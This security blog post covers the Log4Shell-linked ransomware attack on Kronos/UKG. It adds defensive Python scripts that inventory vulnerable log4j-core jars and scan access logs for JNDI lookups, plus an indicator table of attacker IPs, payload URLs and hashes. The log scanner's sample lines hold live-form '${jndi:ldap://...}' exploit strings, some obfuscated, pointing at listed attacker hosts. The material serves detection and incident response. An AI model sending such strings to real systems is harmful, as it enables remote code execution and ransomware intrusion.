January 23, 2022

TheCyberThrone

Thinking Security ! Always

Kronos Suffers Ransomware Attack, Suspected on Log4J Exploit


A ransomware attack has hit workforce management solutions provider Kronos and knocked its services offline. The attack specifically targeted the Kronos Private Cloud, taking down UKG Workforce Central, UKG TeleStaff, Healthcare Extensions and Banking Scheduling Solutions with it.

UKG, the parent company of Kronos, said that the ransomware attack could keep its services offline for several weeks, and advised customers to find other ways to process payroll and handle human resources activities in the meantime.


At this time, we still do not have an estimated restoration time, and it is likely that the issue may require at least several days to resolve. We continue to recommend that our impacted customers evaluate alternative plans to process time and attendance data for payroll processing, to manage schedules and to manage other related operations important to their organization.

Kronos Statement

Kronos did not reveal the form of ransomware involved in the attack. Reports suggest that the attackers exploited Log4Shell, the name given to the critical Log4j vulnerability (CVE-2021-44228) that has dominated headlines over the last few days; that attribution has not been confirmed by the company.

The Log4j vulnerability is a flaw in Log4j, the popular open-source logging library used by applications written in Java: a specially crafted string that ends up in a log message (for example from an HTTP header) triggers a JNDI lookup, which can fetch and execute code from an attacker-controlled server.

With the Log4j vulnerability affecting so many internet-facing systems, Kronos/UKG may be old news soon. There are already reports of a variety of actors using Log4j exploits, and Microsoft has already observed Cobalt Strike, a common precursor to ransomware, being dropped on systems exploited through Log4j. It won't be long before more ransomware events are reported with Log4j as the initial vector.


Developers use libraries written by third-party companies and engineers to speed up the software release process, and Log4j is one of the most widely used of them: a basic library for writing logs from Java applications. Exposure to the Log4j vulnerability comes in three layers: cloud products that use Log4j directly, web applications that use libraries which themselves depend on Log4j, and off-the-shelf software deployed internally on customer servers and endpoints. The first layer is where Kronos has been hit by ransomware.
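The third layer, software running on your own servers, is the one you can inventory yourself. The script below is an added example, not code from the original post or from Kronos/UKG: it walks a directory tree, opens every .jar/.war/.ear it finds, recurses into archives nested inside them, reads the log4j-core version from the Maven pom.properties and checks whether JndiLookup.class (the class that implements the vulnerable lookup, and the one the "delete the class" mitigation removes) is present. The archives it scans are constructed fixtures written to a temporary directory with only those marker files inside, not real Log4j builds.

```python
import io
import os
import re
import tempfile
import zipfile

# Marker files inside a log4j-core jar: Maven metadata carrying the version,
# and the class implementing the vulnerable ${jndi:...} lookup.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def version_affected(version: str) -> bool:
    """True for log4j-core 2.x below 2.15.0, minus the 2.12.2+ (Java 7) and
    2.3.1+ (Java 6) backports that also closed CVE-2021-44228. Pre-release
    tags such as 2.0-beta9 are treated as 2.0.x."""
    nums = [int(p) for p in re.findall(r"\d+", version)[:3]]
    if not nums or nums[0] != 2:
        return False
    nums += [0] * (3 - len(nums))
    _, minor, patch = nums
    if (minor, patch) >= (15, 0):
        return False
    if minor == 12 and patch >= 2:
        return False
    if minor == 3 and patch >= 1:
        return False
    return True


def inspect_archive(zf: zipfile.ZipFile, path: str, findings: list) -> None:
    """Record log4j-core evidence in one archive, then recurse into archives inside it."""
    names = zf.namelist()
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_LOOKUP in names
    if version is not None or has_jndi:
        findings.append({
            "path": path,
            "version": version,
            "jndi_lookup_present": has_jndi,
            # Lookup class present with no version metadata is treated as affected.
            "affected": has_jndi and (version is None or version_affected(version)),
        })
    for name in names:  # fat jars, wars and ears bundle further archives
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(inner, f"{path}!/{name}", findings)


def scan_tree(root: str) -> list:
    """Walk a directory and inspect every archive found under it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(full) as zf:
                    inspect_archive(zf, full, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def summarize(findings: list) -> dict:
    """Archive base name -> (version, JndiLookup present, affected)."""
    return {os.path.basename(f["path"].split("!/")[-1]):
            (f["version"], f["jndi_lookup_present"], f["affected"]) for f in findings}


def _make_jar(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree() -> str:
    """Constructed fixtures (hypothetical, not real Log4j builds): minimal jars
    carrying only the marker files, written to a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="log4j-inventory-")
    os.makedirs(os.path.join(root, "lib"))
    props = "groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={}\n"
    fake_class = b"\xca\xfe\xba\xbe"  # Java class-file magic and nothing else
    vulnerable = _make_jar({POM_PROPS: props.format("2.14.1"), JNDI_LOOKUP: fake_class})
    stripped = _make_jar({POM_PROPS: props.format("2.14.1")})  # JndiLookup.class deleted
    fixed = _make_jar({POM_PROPS: props.format("2.15.0"), JNDI_LOOKUP: fake_class})
    unrelated = _make_jar({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"})
    war = _make_jar({"WEB-INF/web.xml": "<web-app/>",
                     "WEB-INF/lib/log4j-core-2.15.0.jar": fixed})
    for name, data in {"lib/log4j-core-2.14.1.jar": vulnerable,
                       "lib/log4j-core-2.14.1-stripped.jar": stripped,
                       "lib/commons-io-2.11.0.jar": unrelated,
                       "app.war": war}.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for name, (ver, jndi, bad) in sorted(summarize(scan_tree(build_sample_tree())).items()):
        print(f"{name}: version={ver} JndiLookup={jndi} affected={bad}")
```

Point scan_tree at a real application directory to use it for inventory. The version check alone is not enough: a 2.14.1 jar with JndiLookup.class removed is reported as not affected, while a jar with the class present but no Maven metadata is reported as affected, which is the conservative call for a shaded or repackaged build.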

Even organizations with the best of intentions, including a serious deployment of cybersecurity measures, are exposed: Log4Shell is so serious because the malicious string rides inside ordinary application input and so bypasses many traditional protection solutions.

Although Kronos Private Cloud was protected by firewalls, encrypted transmissions and multifactor authentication, the attackers were still able to breach and encrypt its servers. The extended shutdown will likely present challenges for many organizations as they seek to roll out bonuses and as employees request time off ahead of the holidays.

Notable Kronos customers include Tesla Inc., Marriott International Inc., Yamaha Corp., Aramark Corp., Samsung Electronics Co. Ltd. and Sony Music Entertainment.


Indicators of Compromise – Accumulated So Far

The initial compilation of IoCs accumulated so far from Log4Shell exploitation activity (all hashes are SHA-256). The list may be extended in the coming days.

Type   Content
IP     203.134.248.176
IP     77.40.42.110
IP     206.189.99.39
IP     68.183.33.144
IP     75.119.140.120
IP     206.189.29.232
IP     138.197.216.230
IP     167.99.172.99
IP     167.99.204.151
IP     159.89.115.238
IP     104.244.79.6
IP     185.220.101.39
IP     171.25.193.77
IP     171.25.193.78
IP     171.25.193.20
IP     171.25.193.25
IP     45.155.205.233
IP     172.105.241.146
IP     45.83.193.150
IP     62.210.130.250
IP     109.237.96.124
IP     89.234.182.139
URL    http://62.210.130.250/web/admin/x86;chmod
URL    http://62.210.130.250/web/admin/x86_g;chmod
URL    http://80.71.158.12/Exploit69ogQNSQYz.class
URL    http://62.210.130.250/web/admin/x86_64;chmod
URL    http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd
Hash   2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
Hash   bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6
Hash   58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae
Hash   ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4
Hash   dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e
Hash   a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8
Hash   7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b
Hash   4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47
Hash   473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6
Hash   b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02
Hash   dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d
Hash   85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c
Hash   db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a
Hash   ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0
Hash   a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d
Hash   c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d
Hash   8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc
Hash   c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a
Hash   6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2
Hash   535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6
Hash   42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239
Hash   4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997
Hash   df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6
Hash   28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e
Hash   cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392
Hash   5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4
Hash   ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa
Hash   815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e
Hash   10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c
Hash   dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae
Hash   9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d
Hash   f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d
Hash   5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3
Hash   d4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d
Hash   3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100
Hash   057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3
Hash   5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c
Hash   c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3
Hash   6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992
Hash   54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b
Hash   e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1
Hash   68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa
Hash   9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463
Hash   006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85
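The exploit string that bypasses perimeter controls still has to be logged somewhere, and web server access logs are the first place to look for it. The script below is an added example, not code from the original post or from Kronos/UKG: it parses combined-format access log lines, URL-decodes each field until stable, strips the lookup-based obfuscation attackers use to dodge simple pattern matching (${lower:j}, ${upper:n}, ${::-l}, ${env:NOPE:-d}), then searches for a ${jndi:...} lookup and flags whether the source address or the callback host appears in the IoC list above. The IoC set is a subset copied from the table (the hosts of the listed URLs included); the log lines are constructed samples, not real traffic, using RFC 5737 documentation addresses for the non-indicator hosts.

```python
import re
from urllib.parse import unquote

# Subset of indicator IPs from the table above, plus the hosts of the listed URLs.
IOC_IPS = {
    "62.210.130.250", "172.105.241.146", "45.155.205.233",
    "185.220.101.39", "80.71.158.12",
}

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = r"""
203.0.113.10 - - [10/Dec/2021:20:01:13 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
62.210.130.250 - - [10/Dec/2021:20:01:14 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://62.210.130.250:1389/a}"
198.51.100.7 - - [10/Dec/2021:20:02:02 +0000] "GET /${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"
45.155.205.233 - - [10/Dec/2021:20:03:55 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F45.155.205.233%2Fo%7D HTTP/1.1" 200 12 "-" "-"
192.0.2.5 - - [10/Dec/2021:20:04:10 +0000] "GET /static/app.js HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
""".strip().splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# Innermost obfuscation lookups: ${lower:x}, ${upper:x}, ${::-x}, ${env:NOPE:-x}.
OBFUSCATION_RE = re.compile(
    r"\$\{(?:(?:lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}", re.IGNORECASE)
# The lookup itself: scheme (ldap, ldaps, rmi, dns, ...) and the callback host.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.IGNORECASE)


def normalize(value: str) -> str:
    """URL-decode until stable, then collapse lookup obfuscation from the inside out,
    so ${${lower:j}ndi:${::-l}dap://h/} becomes ${jndi:ldap://h/}."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    prev = None
    while prev != value:
        prev, value = value, OBFUSCATION_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), value)
    return value


def scan(lines) -> list:
    """One finding per log line whose request, referer or user-agent carries a JNDI lookup."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; a real run would count these
        src = m.group("ip")
        for field in ("req", "ref", "ua"):
            decoded = normalize(m.group(field))
            hit = JNDI_RE.search(decoded)
            if hit:
                host = hit.group("host")
                findings.append({
                    "line": lineno, "src_ip": src, "field": field,
                    "scheme": hit.group("scheme").lower(), "callback": host,
                    "src_in_ioc": src in IOC_IPS, "callback_in_ioc": host in IOC_IPS,
                    "decoded": decoded[hit.start():hit.start() + 80],
                })
                break  # one finding per line is enough for triage
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Feed it a real log with scan(open("access.log").read().splitlines()). Two caveats a practitioner should keep in mind: the exploit string can arrive in any field an application logs, not only the three this parser examines, and the callback host is often not in any IoC list yet, so a JNDI lookup pointing at an unknown host is still a finding worth chasing.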